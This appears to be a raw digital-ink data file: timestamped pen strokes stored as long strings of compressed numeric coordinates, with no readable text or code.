0,4-3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9T21:25:32.3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1804 14 8191,'-32'-7'0,"-5"1"5063,5 6-5063,-38 0 2818,8 0-2818,-27 8 0,15-6 0,0 14 0,0-5 0,0 7 0,-17 6 0,28-12 1719,-10 8-1719,42-14 6784,-7 7-6784,7-2 0,-9 3 0,0-1 0,1 0 0,12-6 0,-9 5 0,9 1 0,-30 7 0,12-5 0,-12 2 0,17-9 0,1 5 0,12-6 0,-1 3 0,16 1 0,-3-4 0,0 6 0,4-7 0,-5 4 0,6 1 0,-5-6 0,-1 9 0,-1-12 0,2 12 0,0-13 0,-1 8 0,-5-7 0,0 7 0,0-4 0,5 1 0,1 3 0,4-3 0,1 4 0,-1-4 0,1 3 0,0-3 0,-1-1 0,1 5 0,-1-9 0,5-1 0,6-1 0,1-13 0,4 2 0,0-9 0,0 0 0,1 5 0,-1-12 0,4 9 0,-7-18 0,7 6 0,-4-1 0,-4-5 0,4 14 0,-1-2 0,-3 5 0,4 9 0,-1-4 0,-2 4 0,7 1 0,-8-1 0,3 5 0,-4 2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9T21:25:33.9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24575,'17'12'0,"-3"-1"0,24 7 0,-7 1 0,56 29 0,-35-16 0,-4-9 0,0 0 0,-6-3 0,7-3 0,-23 0 0,-2-9 0,-14 1 0,0-9 0,-4 0 0,-2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9T22:58:07.6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1300 710 10411,'-30'0'0,"-62"-28"3978,49 16-3978,-14-6 0,2-1 2653,24 6-2653,-24-3 1573,16 3-1573,-1 0 4964,-15-3-4964,11-4 996,-26 1-996,27-7 0,-12 3 0,15-3 0,-15-6 0,20 7 0,-17 0 0,24 1 0,2 10 0,6-1 0,10 5 0,-1 5 0,6-11 0,-5 5 0,5-4 0,-15-5 0,7 7 0,-2-7 0,6 15 0,7-5 0,-7 9 0,8-8 0,-8 3 0,3-4 0,-5 4 0,1-3 0,-5 7 0,-1-7 0,-1 3 0,-2-4 0,7 4 0,2-3 0,0 3 0,4 0 0,1-3 0,0 3 0,5-4 0,-5-1 0,0-4 0,-6 3 0,5-3 0,-3 9 0,8-3 0,-4 13 0,5 1 0,0 11 0,-4 0 0,2 4 0,-2-4 0,-1 0 0,4 8 0,-4-11 0,1 15 0,3-10 0,-4 2 0,5 0 0,0 5 0,0-7 0,0 7 0,0-15 0,0 0 0,6-22 0,0 3 0,1-11 0,-3 11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9T22:58:08.6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1 175 18209,'4'-10'0,"2"4"2887,4-3-2887,0 8 1089,1-4-1089,4 5 570,9-6-570,40-4 0,14-7 0,17-2 1388,-6-1-1388,-15 1 0,-16 3 0,-7 2 0,-25 2 0,-7 6 0,-13 1 0,-2 5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9T22:58:10.9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1657 191 24575,'-29'-6'0,"-2"4"0,-24-4 0,-19 6 0,-1 0 0,-6 0 0,12 5 0,-1 1-1480,-19-1 0,3 2 1480,30 3 0,4 1 0,-37 9 698,15-10-698,-2 4 0,25-13 0,4 5 0,26-6 0,-9 0 2262,7 0-2262,-25-6 0,-1 5 0,-1-3 0,-3 2 0,-30 10 0,-11-6 0,52 11 0,9-7 0,21-1 0,1-5 0,8-6 0,12-4 0,-8 0 0,8 4 0,-3-8 0,4 7 0,0-4 0,-4 2 0,3 3 0,-3-4 0,13-10 0,-6 7 0,6-6 0,-8 8 0,-1 5 0,0-3 0,5 3 0,-4-4 0,14-1 0,-13 5 0,3-3 0,-6 3 0,-3-4 0,4 4 0,1-3 0,-1 3 0,0-4 0,0-1 0,-4 1 0,3 4 0,-8-3 0,4 17 0,-5-11 0,0 13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9T22:58:12.1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24575,'15'15'0,"1"1"0,7 13 0,14 9 0,-2-3 0,24 29 0,-33-39 0,13 17 0,-37-27 0,12-8 0,-13 6 0,8-7 0,-8 4 0,4-4 0,-5-1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9T23:16:06.66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2782 24575,'47'-23'0,"13"-1"0,-2 8 0,-8 5 0,-2-2 0,2-3-1769,39-10 1769,-28 8 0,4 0 0,6-5 0,-4 1 0,30-1 0,-25 1 0,6-2-1200,9 4 0,3 2 1200,-5-2 0,2 0 0,-9 3 0,3-1 0,-5 2 0,0 2 0,-3 1 0,13-5 0,1-1 0,-7 7 0,-3 0 0,-4 0 0,0 0 0,7 0 0,-2 0 0,-14 0 0,-2 1 0,1-1 0,-3 1 0,33-1 0,-4-6 0,0 7 0,-12 0 161,-17 1 0,0 0-161,21-1 0,0-5 0,3-4-623,-24 2 0,-1 1 623,19-2 0,2-1-461,5-10 0,-1 1 461,-17 15 0,0-1 0,20-14 0,-1-1 0,-21 12 0,-3 1 0,2-1 0,-5 1 1177,10-5-1177,-20 12 0,0 1 0,20-3 595,9-6-595,-17-2 1315,-23 5-1315,-24 0 1981,21-4-1981,-13 0 947,17-2-947,1-4 0,30-3 0,7-17-864,-25 27 0,4-1 864,4-12 0,3 0 0,8 10 0,0 2 0,-7-9 0,3-1 0,22-3 0,6 2 0,-32 12 0,1 1 0,5-1 0,8-2 0,6 0 0,2 0 0,-2 2 0,-7 5 0,-1 1 0,-1 2 0,1-1-829,4-3 0,1 0 1,-1 1-1,-4 3 829,7 3 0,-3 4 0,-2-2 0,-5-3 0,-2-1 0,0 2-956,29 5 1,1 1 955,-30-2 0,0-2 0,-2 1 0,14-1 0,-3-1 0,0 2 0,-1-5-371,-6-6 1,-2-4 370,1 2 0,0-3 0,0-8 0,0-2 0,0 5 0,0 0 0,1-4 0,-2 0 0,-14 7 0,-1 1 0,13 3 0,-1 0 0,-19 3 0,0 2 0,6 6 0,0 1 0,35-12 1178,-15 16-1178,-16-6 2998,-3 8-2998,-29 4 2397,2-3-2397,-16 4 1122,3-1-1122,0-2 0,9 2 0,-1-4 0,14 0 0,-6-6 0,16-20 0,5-24 0,-2 4 0,-13-5 0,15-6 0,-30 32 0,19-24 0,-26 39 0,-5 4 0,-4 6 0,-7 1 0,-4 3 0,-6-4 0,1 0 0,-10-4 0,-6 3 0,-1-9 0,-11 3 0,-9-7 0,-26-13 0,-5 5 0,29 3 0,-6-2 0,-37-3 0,-3 2-504,29 3 1,1 1 503,-32-2 0,7 4 0,16 7 0,27 9 0,18 0 0,13 0 0,6 4 0,0-3 1007,9 9-1007,1-5 0,10 6 0,6-1 0,21 20 0,11-3 0,17 18 0,-7-22 0,4-3 0,-11-3 0,-2-2 0,41 9 0,-42-14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9T23:16:07.58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446 0 24575,'-9'15'0,"1"10"0,-15 6 0,5 0 0,-2 6 0,-16 1 0,8 19 0,-13-7 0,10 5 0,5-16 0,-1 1 0,0 0 0,3-9 0,-4 2 0,15-15 0,-5 1 0,12-9 0,-4 1 0,4-1 0,1 0 0,1 0 0,2 1 0,-7-1 0,8 0 0,-8 1 0,7-1 0,-2 0 0,-1 0 0,4 1 0,-4-6 0,5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9T23:16:12.03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9704 0 24575,'-11'0'0,"-12"0"0,9 0 0,-22 0-8503,-6 0 8503,-32 0 0,-19 0 862,0 8-862,42-7 0,-2 0 0,-1 3 0,0 1 0,-43 3 0,30-2 0,0 0 0,-30 5 0,31 4 0,-9 4 0,5-1 0,6-4 0,-2 2 0,-21 8 0,-12 4 0,10-2 0,16-6 0,4-3-1102,-26 2 0,-1-3 1102,19-5 0,0-1 0,-19 3 0,-2 1-79,5-1 1,-3 2 78,7-2 0,-6 1 0,6-3 1537,-7-3 1,3-2-1538,18-2 0,-3 0 0,6 0 452,0 0 1,-2 1-453,-21 4 0,-10 3 0,9 2 0,14 4 0,2 2 510,-5-2 1,-6 0 0,13 0-511,22-1 0,8-1 212,-28 15-212,1-12 0,23-1 0,1 2 0,-14 6 0,15-3 0,3-2 2528,3-5-2528,-26 8 0,26-16 0,-27 2 0,-8-1 0,-16 0 0,26-4 0,-10 2 0,6 0 0,4-1 0,2 0-330,-20 6 0,-1-1 330,26-5 0,-3 1 0,-10 3 0,-8 2 0,7-2 0,8-2 0,0-1 0,-4 1 0,-6 0 0,9 0-248,12 2 0,5-1 248,-40 2 0,3 9 0,20 2 0,4 1 0,0-2 0,6 4 0,5-2 0,23-9 0,-1 3 0,3-5 2310,-27 16-2310,3-10 0,-18 12 596,1-12-596,11-10 0,1 6 0,-12-5 0,11 7 0,0-5 0,4 3 0,1 3 0,-20 13 0,11 2 0,0-4 0,-1 0 0,-5 9 0,14-6 0,2 0 0,-4 4 0,-7 15 0,20-20 0,-31 20 0,15-16 0,-10 8 0,13-10 0,16-9 0,4-10 0,-37 2 0,24-13 0,-47 17 0,53-17 0,-26 14 0,-4 5 0,-16 4 0,-8 2 0,17-2 0,-1 1 0,13-6 0,-2-1 0,5-1 0,0 0 0,10-2 0,-3 3 0,14-5 0,29-3 0,1-6 0,4 0 0,1-1 0,-1-2 0,1 2 0,4-9 0,6 0 0,6-6 0,4 1 0,0-1 0,1 1 0,-1-5 0,0-1 0,5-5 0,-4 0 0,17-26 0,-2-4 0,4 3 0,2-4 0,3-27 0,12 5 0,-26 21 0,-3 17 0,0 8 0,-1 0 0,-12 18 0,4-1 0,-3 1 0,0 4 0,-2 1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9T23:16:12.93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12593,'9'3'0,"3"4"4035,62 36-4035,-32-20 0,4 3 0,31 15 0,7 4-265,-21-14 0,2-1 1,0 1 264,-3-1 0,0 1 0,2 0 0,14 5 0,3 0 0,-2-2 0,-11-6 0,-3-1 0,2-1 0,4-2 0,0-1 0,-2-2 488,14 6 1,-4-6-489,-14-13 0,-7-3 0,2 5 0,-26-10 0,-29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0T15:22:43.20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24575,'7'3'0,"55"37"0,25 8-1076,-34-15 1,2-1 1075,1-5 0,-1-3 0,32 14 631,-1-16-631,-17 1 369,-18-21-369,-26 7 0,-12-16 0,-10 9 0,-7-11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9T23:17:43.92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0 208 24575,'5'-6'0,"1"1"0,8 5 0,20 0 0,0 0 0,14 0 0,22-9 0,-7 6 0,25-6 0,-14 9 0,-14 0 0,2 0 0,-12 0 0,1 0-1571,18 0 0,2 0 1571,-2 0 0,1 0 0,3 0 0,0 0 0,-9-1 0,3 2 0,22 3 0,2 3 0,-16 0 0,0 1 0,15 5 0,1-1-674,-11-5 0,-3 0 674,-6 4 0,-3-1 0,-12-3 0,-1-2 0,7 1 0,-1 1 0,32 11-319,-4-16 319,-15 6 0,-1-16 0,16-4 0,-11-15 0,11 14 0,-16-4 0,1 9 0,15 6 0,-35-7 0,29 9 0,-3 11 1981,17 1-1981,-36-1 0,1 0 0,-9-1 0,2 2 0,17 12 0,-4-1 0,10-4 0,-20 8 0,0-2 0,7-21 0,-12 4 0,2 0 0,26-8 0,-16 1 0,1-2 0,30-9 0,-42 5 0,4-1 0,26-6 0,-3-1 0,-8-4 0,0 10 0,1 1 0,3-10 0,16 14 0,-34-3 0,1 0 0,37 5 0,-36 0 0,1 0 0,-10-1 0,3 2 0,9 5 0,7 2 0,-4 0 0,7 0 0,-2 0 0,17 3 0,-3 2 0,-26 1 0,-4 2 0,-3-3 0,2 1 0,9 4 0,2-1 0,5-3 0,1-3 0,-2-4 0,-2-4 0,28-3 0,-31 1 0,5-2 0,17-3 0,1-3 0,-25 2 0,1-1-64,37-6 0,-4 0 64,-1 1 0,-27 0 0,0 1 318,28 8-318,-44-8 0,-2 1 0,23 7 0,-16-7 0,-3 9 0,15 0 0,22 0 209,-36 0 0,0 0-209,37 0 0,-41-4 0,-4-1 0,-1-3 1685,38-4-1685,-26 7 0,0-1 0,3 2 0,24 2 0,-24-3 0,-2 0 0,13 5 0,1 0 0,0 0 0,-16 0 0,12 0 42,-11-8-42,-9 1 0,3-7 0,-30 3 493,7 1-493,-13 4 0,-3 2 0,-3 4 0,-1 0 0,0 0 0,5 0 0,1 0 0,13 0 0,3 0 0,22 0 0,5 0 0,-1 0 0,-3-6 0,2-8 0,-26 5 0,10-2 0,-31 6 0,0 4 0,1-4 0,-1 5 0,0 0 0,0 0 0,5 0 0,10 0 0,-7 0 0,10 0 0,-4 0 0,-6 0 0,6 0 0,-14-4 0,0 2 0,1-2 0,-1 4 0,0 0 0,-4-5 0,-2-1 0,-8 0 0,3-3 0,-9 3 0,-5-4 0,-2-1 0,-17 0 0,11 0 0,-15-2 0,-8-10 0,2 13 0,-26-22 0,9 21 0,2-12 0,10 11 0,20 5 0,12 2 0,2 0 0,5 4 0,-1-4 0,1 5 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,4 5 0,1 1 0,5 4 0,0 0 0,0-4 0,0-1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9T23:17:45.30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396 1 24575,'-16'15'0,"-15"18"0,11-7 0,-28 27 0,24-28 0,-13 11 0,16-15 0,5-5 0,1-1 0,5-5 0,-1 0 0,1 5 0,-5-4 0,3 9 0,-3-9 0,9 4 0,1-4 0,5-1 0,-4-4 0,3 3 0,-4-4 0,0 1 0,4 3 0,-3-3 0,4 4 0,-5-4 0,4 3 0,-9-3 0,0 4 0,3 0 0,-7-4 0,13 3 0,-8-8 0,7 8 0,-2-12 0,4 2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9T23:17:48.14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10182 535 8390,'-11'-6'0,"5"-4"5084,-3 9-5084,8-8 2789,-8 8-2789,-2-4 1691,0 5-1691,-9 0 6621,4 0-6621,-14 0 0,-1 0 0,4 0 0,-24 0 0,20 0 0,-39 0 0,11 0 0,-14 0 0,21 0 0,-1 0 0,-43 0 0,42 0 0,0 0 0,2 5 0,-1 0 0,0-4 0,-2 0-845,-9 4 1,1 0 844,-33-5 0,38 0 0,0 0-399,-35 0 399,-3 0 0,36 0 0,0 0 0,-33 0 0,31 0 0,-1 0 0,-35 0 0,44-1 0,2 2 0,-22 7 0,0-6 0,0 6 0,0 0 0,-15-6 302,36 2 1,-2 0-303,1-3 0,-4-2 0,-19 1 0,-2 0 0,12 5 0,3 1 0,6-2 0,2 0 0,-2 2 0,0 0 0,4 3 0,0-1 0,-3-6 0,-2-1 0,-17 5 0,-2-1 0,15-4 0,-1-2 0,-14 1 0,-1 0 0,6 0 0,0 0 0,-14 0 0,1 0-638,12 0 1,2 0 637,-7 5 0,0 1 0,1-5 0,-1 0 0,-2 5 0,0-1 0,9-5 0,-2 0 0,-10 0 0,-1 0 0,12 0 0,0 0 0,-8-5 0,0-1 0,3 5 0,-1 0 0,-18-5 0,4 1 0,30 4 0,2 2-1324,-24 4 1,2 0 1323,29-4 0,0 0 0,-15 4 0,-4 0 0,1-5 0,-2 0 0,-7 0 0,5 0-591,-21 0 591,32-6 0,-1 1 0,-30 2 0,18-7 0,-2-1 0,16 9 0,-3 1 0,-4-6 0,-6-1 0,8 2 0,12 4 0,2 1 0,-33-4 0,8 1 0,21 4 395,4-6-395,0 4 0,12-3 0,-12 5 2613,15 0-2613,-14 0 1717,10 0-1717,-26 8 1271,26 0-1271,-2 1 0,8-3 0,-8-6 0,11 0 0,-18 0 0,21 0 0,-7 0 0,-1 0 0,0 0 0,-14 0 0,10-6 0,-11 5 0,15-5 0,1 6 0,-34 0 0,10 0 0,-28-8 0,17 5 0,15-11 0,4 13 0,16-5 0,7 6 0,8 0 0,8 0 0,6 0 0,-5 0 0,-1 0 0,-5 0 0,4 0 0,-2 5 0,7-4 0,-8 3 0,9-4 0,-9 0 0,4 0 0,-5 0 0,-24-8 0,19 6 0,-58-6 0,45 8 0,-10-5 0,-2 0 0,7 3 0,-16-13 0,39 14 0,6-3 0,4 4 0,-4 0 0,3 4 0,-7-3 0,7 8 0,-3-7 0,0 2 0,-1-4 0,-5 0 0,0 0 0,5 0 0,0 0 0,11-5 0,5 0 0,5-15 0,6 2 0,-1-2 0,0 0 0,-4 8 0,3-8 0,-8 4 0,8-5 0,-3 0 0,4 0 0,0 5 0,1 1 0,-1 5 0,-4-1 0,3 1 0,-8-1 0,8 5 0,-3-3 0,0 3 0,-2-4 0,2-14 0,0 6 0,10-11 0,0 8 0,5 5 0,0-4 0,8 1 0,-6-2 0,1 2 0,-9-1 0,-9 13 0,-2-2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9T23:17:49.42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24575,'10'9'0,"5"-2"0,-3 13 0,3-4 0,0 5 0,20 38 0,15 5 0,-17-16 0,0 1 0,13 21 0,-6-18 0,-27-14 0,3-20 0,-9 10 0,2-17 0,-3 9 0,-1-9 0,4 4 0,-7-5 0,7 1 0,-8-1 0,8-4 0,-8 3 0,8-3 0,-3 4 0,0 0 0,-2 0 0,1-4 0,-4 3 0,8-8 0,-8 13 0,4-7 0,-1 8 0,-3-5 0,9 1 0,-9-1 0,8 0 0,-8 0 0,8 1 0,-8-1 0,4 0 0,-1 0 0,-2-8 0,7-4 0,-8-21 0,3 14 0,-4-9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9T23:19:14.55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24575,'9'15'0,"7"10"0,21 13 0,8 12 0,10 5-8503,4 14 8503,12-6 0,-21 0 775,-11-27 1,1-1-776,6 17 0,-11-11 0,3 1 0,4-4 0,1 0 0,-4 5 0,2 1 0,19 12 0,-2-4 0,4 10 0,-17-12 0,-3-4 0,-8-15 0,1 9 0,1 0 0,9-7 0,-6 3 0,3 7 0,5 6 0,0 0 0,0-6 0,0 1-521,10 17 0,1 0 521,-8-19 0,0-4 0,0 1 0,0 0 0,5 1 0,2-2 0,4-3 0,1-3 0,2-2 0,-1-2 0,-6 0 0,-2-3 0,-2-7 0,-2-3 0,23 12 0,-16-5 6184,12-3-6184,-12 11 233,1-12-233,11 17 0,-2-5 0,-8-2 1577,-4-1-1577,-27-16 0,-13 0 0,4-6 0,-9 5 0,9 0 0,-4 1 0,5 9 0,8-7 0,-7 2 0,16-2 0,-15 2 0,32 5 0,-20 4 0,22-4 0,-2 10 0,-20-16 0,33 12 0,-18-3 0,24 5 0,-1 9 0,-23-16 0,34 14 0,-31-14 0,-1 0 0,1 1 0,9 5 0,3-3 0,3 0 0,18-2-891,-17-2 0,2-1 891,-16-12 0,-2-2 0,2 0 0,-2-1 0,40 5 0,-4-7-410,0 6 410,-12-8 0,-26 0 0,2 0-516,0 0 1,2 0 515,6 0 0,5 0 0,4-1 0,7 1 0,-4 1 0,8 3 0,0 2-1137,-4-1 0,6-1 1,-7 1 1136,-1 2 0,-5-1 0,-5 1 0,-3-2 659,-8-5 1,-4 0-660,24 0 0,-24 0 0,3 0 0,-22 0 340,9 0-340,-1 0 927,-8 4-927,22-3 0,1 11 0,5 0 0,-8-10 0,3 0 0,39 8 0,2-1 0,-28-8 0,-2-2 1175,14 1 1,1 0-1176,-10 0 0,2 0 0,-6 0 0,4 0 0,0 0 0,22 0 0,4 0 0,-6 0 0,6 0 0,-5 0 0,-21 0 0,-3 0 0,0 0 0,3 0 0,1 0 0,-3 0 0,10 0 0,1 0 0,-5-2 0,4-2 0,-7 0 0,-5-1 0,0 0 0,1 1 0,6 1 0,-11-2 0,16-12-879,13 15 879,-32-6-370,31 2 370,-42 5 0,27-11 0,-36 10 1583,1-9-1583,14 1 0,-1-7 0,1-1 0,3 3 0,19-7 0,-4 0 0,-34 12 939,41-8-939,-50 8 423,-8 4-423,8 0 0,2 1 0,9 0 0,-1 3 0,1-4 0,-1 0 0,-12 5 0,9-5 0,23 6 0,-24-5 0,35-1 0,-56 1 0,10 0 0,-14 5 0,0 5 0,1 0 0,4 1 0,1 3 0,4-8 0,1 8 0,8-7 0,35 2 0,-1-4 0,13 0 0,-6 0 0,-9 0 0,-2 0 0,-1-5 0,-31 0 0,-3-1 0,-14 1 0,5 5 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,13-4 0,-11 2 0,11 2 0,-8 1 0,13 4 0,3-5 0,0 0 0,-7 0 0,-10 0 0,-9-5 0,3 4 0,-13-8 0,-10 2 0,-13-11 0,-12 3 0,-16-6 0,-24-5 0,15 7 0,-2-5 0,28 11 0,15 3 0,-6 3 0,8-3 0,5 5 0,-4-1 0,8-4 0,-3 5 0,5-6 0,-28-10 0,16 8 0,-30-13 0,33 19 0,-5-6 0,14 11 0,4-7 0,-4 8 0,9-4 0,-3 5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9T23:19:15.61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1104 21 24575,'-5'-5'0,"-1"-5"0,-4 9 0,-5-4 0,3 5 0,-8 0 0,-4 0 0,-8 12 0,6-9 0,-56 40 0,28-27 0,3 9 0,-2 0 0,-21-4 0,-15 16 0,34-22 0,0-1 0,-27 20 0,2-11 0,51-1 0,0-3 0,-23 31 0,20-28 0,-12 25 0,33-44 0,1 10 0,-14 0 0,6 4 0,-2-3 0,11-5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4T01:10:58.37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4637 14 24575,'6'-8'0,"-11"2"0,4 6 0,-19 0 0,-1 0 0,-17 0 0,-4 0 0,-10 0 0,4 6 0,-23-4 0,30 3 0,-27-5 0,27 0 0,-31 0 0,-27 8 0,17 2 0,-13 7-500,24 3 500,-6 1 0,1-8 0,15 4 0,12-16 0,9 5 0,-32-6 0,15 8 0,-20 1 0,4 22 0,10-11 0,20 1 0,-5 3 0,-23 10 0,0 0 0,25-8 0,-1-1-428,-32 11 0,1-2 428,2 5 0,17-16 0,-2-1 0,11-3 0,-2 1 0,-20 12 0,2-3 0,-12-4 0,17 4 0,4 0 0,1 1 0,-24 9 0,33-7 0,-14 11 0,-4 3 0,23-19 0,0 2 0,-28 28 0,0 0 0,27-31 0,0-1 0,-11 19 0,1 2 0,-27 3 0,20-8 0,3-2 0,4-3 0,-19 9 0,24-18 0,10 5 478,4-10-478,-5 28 0,12-17 0,-27 40 0,27-41 0,-23 21 0,30-25 878,-30 14-878,28-18 0,-13 8 0,19-19 0,0-6 0,5 5 0,-23 8 0,26-4 0,-18 3 0,28-7 0,-10-10 0,11 10 0,-11-5 0,4 6 0,-5-5 0,-1 4 0,6-5 0,-4 1 0,11 4 0,-11-11 0,4 11 0,-5-5 0,-1 7 0,0-1 0,1-5 0,5 3 0,-4-3 0,4 5 0,-5 1 0,-1-7 0,7 5 0,1-17 0,6-13 0,0-6 0,0-14 0,-6-7 0,4 19 0,-4-12 0,6 24 0,0 1 0,0-1 0,-6 1 0,4-1 0,-4 0 0,6 1 0,0-7 0,0 5 0,0-17 0,0 16 0,0-10 0,0 12 0,0 1 0,0 5 0,0 2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4T01:10:59.71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24575,'13'0'0,"7"0"0,11 7 0,10 3 0,10-1 0,1 6 0,-1-13 0,43 13 0,-42-13 0,39 14 0,-67-15 0,0 7 0,-18-8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4T01:11:02.70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24575,'13'0'0,"7"6"0,7 7 0,-5 2 0,20 14 0,-24-14 0,18 8 0,-15-9 0,0-7 0,11 11 0,-10-3 0,11 6 0,-6 4 0,46 13 0,-24-4 0,1-10 0,14 2 0,8 3 0,-5-1 0,9 3 0,3 1 0,1 0 0,-4-2 0,6 2 0,-1-2 0,-1 0 0,3 1-290,-7-1 1,6 1 0,-1 0-1,-6-2 1,-11-5 289,12 4 0,-18-8 0,-22-6 0,-15-7 0,29 14 0,-7-4 0,41 9 0,-39-10 0,12 5 0,15 5 0,-8-4 0,28 9 0,-29-8 0,8 3 0,-4-5 0,1-6 0,0-3 0,18 10 0,-1-1 0,-23-7 0,-3-1 0,13 3 0,-10-1 0,-21-2 1447,53-11-1447,-33 2 0,-1 0 0,38-4 0,-6 0 0,-79 6 0,-13-11 0,-14 3 0,-1-11 0,-4-1 0,-1 1 0,-1-1 0,-7 0 0,7 1 0,-10-1 0,14 1 0,-15-1 0,11 0 0,-24-5 0,13 3 0,-14-3 0,19 11 0,-24-10 0,24 15 0,-23-9 0,34 12 0,3-6 0,1 4 0,4-16 0,-5 15 0,5-15 0,-4 11 0,4-1 0,1-4 0,1 4 0,0-5 0,4-1 0,-4 7 0,6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4T01:11:04.38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831 0 24575,'-14'6'0,"0"-4"0,1 3 0,-1-5 0,1 6 0,-18-4 0,-4 11 0,-16-3 0,-21 10 0,-4-10 0,-21 12 0,21-20 0,5 17 0,19-17 0,17 5 0,5-7 0,16 0 0,6 6 0,-4-4 0,11 9 0,-5-3 0,0-1 0,4 5 0,-10-10 0,11 10 0,-12-5 0,6 0 0,-7 5 0,1-10 0,5 10 0,-4-11 0,10 5 0,-4-6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0T15:23:01.5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69 18849,'10'-6'0,"-1"-2"2629,1 6-2629,-5-6 976,4 7-976,-4-8 509,9 8-509,-7-8 1612,5 8-1612,-6-3 0,3 4 0,1 0 0,0 0 0,-1-5 0,1 4 0,-1-3 0,-3 0 0,2 3 0,-3-4 0,5 5 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,5 0 0,-3 0 0,3 0 0,-5 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,5 0 0,-3 0 0,3 0 0,0 5 0,1-4 0,4 3 0,8-4 0,2 0 0,8 0 0,-8 0 0,6 0 0,-14 0 0,2 0 0,-9 0 0,-4 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-4 0,5 2 0,1-2 0,5 4 0,-1 0 0,0 0 0,8 0 0,3 0 0,-1 0 0,6 0 0,-6 0 0,8 0 0,-13 0 0,10 0 0,-17 0 0,10 0 0,0 0 0,-5 0 0,5 4 0,0-3 0,-10 8 0,31-8 0,-20 9 0,37-9 0,-24 5 0,10-6 0,0 0 0,-11 0 0,4 0 0,-17-5 0,-12 4 0,-1-3 0,0 4 0,-4 0 0,9 0 0,-9 0 0,16 5 0,-9-3 0,10 3 0,-7-1 0,-1-3 0,1 4 0,-5-5 0,3 0 0,-3 4 0,0 1 0,-1 1 0,-5-2 0,5-4 0,-7 4 0,10-3 0,-7 3 0,5-4 0,-1 0 0,-4 0 0,4 0 0,1 5 0,4-4 0,8 3 0,-5-4 0,1 0 0,-10 0 0,-3 0 0,-5-4 0,4 3 0,-4-8 0,1 8 0,-2-4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0T22:17:17.11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2445 92 24575,'-34'6'0,"-53"24"0,35-9 0,-4 4 0,-2 2-3277,-19 7 0,1 0 1638,32-12 1,-3 1-1,-12 4 1,-1 2 1454,-3-1 0,-1 0 1025,-18 10 1,0-2-842,20-13 0,3-4 0,10-4 0,2-2 0,-25 5 0,21-9 0,-21 1 0,-7-2 0,1-8 0,4 0 0,22 0 0,-19 0 0,-6 10 3276,1 0-2762,18 4 0,2 0-514,-7-2 3276,-20 9-118,44-14-2103,18 1-1055,2-2 0,5-6 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,7 6 0,-5-5 0,4 5 0,-5-6 0,-1 0 0,0 0 0,1 0 0,-7 0 0,5 0 0,-5 0 0,13-6 0,1-1 0,12-13 0,-5-1 0,5-7 0,0-5 0,-5 4 0,5-15 0,0 14 0,-4-19 0,4 19 0,-6-8 0,6 11 0,7-6 0,-4 10 0,9 3 0,-17 8 0,5 5 0,0-1 0,2-4 0,5-1 0,0-3 0,7-9 0,-5 10 0,4-11 0,-5 11 0,11-23 0,-9 20 0,10-26 0,-19 27 0,-1-2 0,-6 13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0T22:17:18.44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 24575,'27'0'0,"0"0"0,11 8 0,-8-1 0,38 13 0,-3-1 0,-18-2 0,2 1 0,47 9 0,-19 4 0,-6-3 0,0 5 0,-31-12 0,10 6 0,-31-20 0,-4 7 0,4-7 0,-5 5 0,-1-5 0,0 1 0,13 4 0,-10-5 0,15 1 0,-16 3 0,11-9 0,-17 4 0,2-6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1T01:07:51.6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1586 1 24575,'0'11'0,"0"0"0,0 0 0,0 1 0,0-1 0,0 0 0,0 6 0,0-5 0,5 10 0,-4-5 0,4 6 0,-5 0 0,0 9 0,0-7 0,0 2 0,0-6 0,0 6 0,0-2 0,0 7 0,0 0 0,0-7 0,0 16 0,0-16 0,0 16 0,0-16 0,0 16 0,0-16 0,0 7 0,0 0 0,-5 3 0,4 9 0,-5-9 0,0 6 0,4-6 0,-11 8 0,12 0 0,-12 1 0,11-1 0,-4 17 0,1-21 0,3 18 0,-8-32 0,2 16 0,2-21 0,-7 20 0,1-20 0,-2 12 0,-8-9 0,9 0 0,-3-1 0,-1 1 0,4 0 0,-16 26 0,6-11 0,-16 39 0,8-30 0,-3 13 0,11-16 0,-23 22 0,5-9 0,-8 2 0,14-20 0,14-16 0,3-5 0,0 3 0,1-3 0,6-6 0,-1 4 0,-4-10 0,3 5 0,-3-5 0,4-1 0,-5 6 0,-10-2 0,2 12 0,-15 24 0,15-21 0,-6 24 0,8-36 0,6 5 0,0-1 0,0-3 0,5 3 0,-10-5 0,14 1 0,-12-1 0,12 0 0,-8 0 0,-1 1 0,4-1 0,2 0 0,1-4 0,3-2 0,-4-5 0,5 5 0,-5-4 0,10 9 0,-9-9 0,3 9 0,-4-4 0,-6 11 0,5 0 0,-10 1 0,9-7 0,-3-6 0,4 0 0,6 2 0,-4-1 0,8 4 0,-8-9 0,4 9 0,-1-3 0,-3-1 0,4-1 0,-6 0 0,1 1 0,-6 5 0,4 1 0,-8 4 0,3 2 0,-8 14 0,3-7 0,2 2 0,4-11 0,6-10 0,-1-1 0,6 0 0,1 2 0,5 4 0,0 0 0,0-10 0,-5-7 0,4-7 0,-5-9 0,1-1 0,-1-1 0,0-30 0,-6 16 0,5-25 0,2-4 0,-4 6 0,0 8 0,2 2 0,6 10 0,-4 21 0,5-6 0,0 15 0,0 9 0,0 3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1T01:07:52.6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 24575,'10'-6'0,"12"7"0,12 7 0,60 23-1661,-43-19 1,4 0 1660,21 7 0,3-1 0,-1-4 0,0-2 0,9 2 0,-1-1 0,-6 1 0,0-2 0,16-3 0,-2-3 0,-29 1 0,-3-2 0,7-5 0,-7 0 1042,-7 0-1042,-12-5 545,-31-2-545,-7 6 0,-5 2 0,0 5 0,0-1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1T01:18:22.26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1818 10703 24575,'-23'-11'0,"-20"-12"0,13-6 0,-13 2 0,-15-25 0,-5-3-921,17 14 1,-3-3 920,1-4 0,1 2 0,-25-20 0,27 17 0,-10-12 0,1-1 0,7 11 0,4 9 0,1 0 0,-22-30 0,-7-12 0,13 13 0,5-2 0,4 2 188,17-22-188,5 27 0,0-4 0,8-4 0,1-3 0,-9-7 0,0-6 0,7 3 0,0-7 0,2 12 0,2 23 0,-1 2-680,1-17 0,-1-7 0,0 17 680,-11 17 1228,-4-33-1228,5 15 0,4 19 0,1-2 0,-2-36 0,-2 4 0,-1-3 0,14 25 0,0 0-189,-7-21 0,1 0 189,7 23 0,1-2 0,-5-39 0,2 0 0,6 43 0,1 0 0,-7-33 0,3 6 0,9 21 0,-5-7 0,-1-3 0,6-12 0,-3 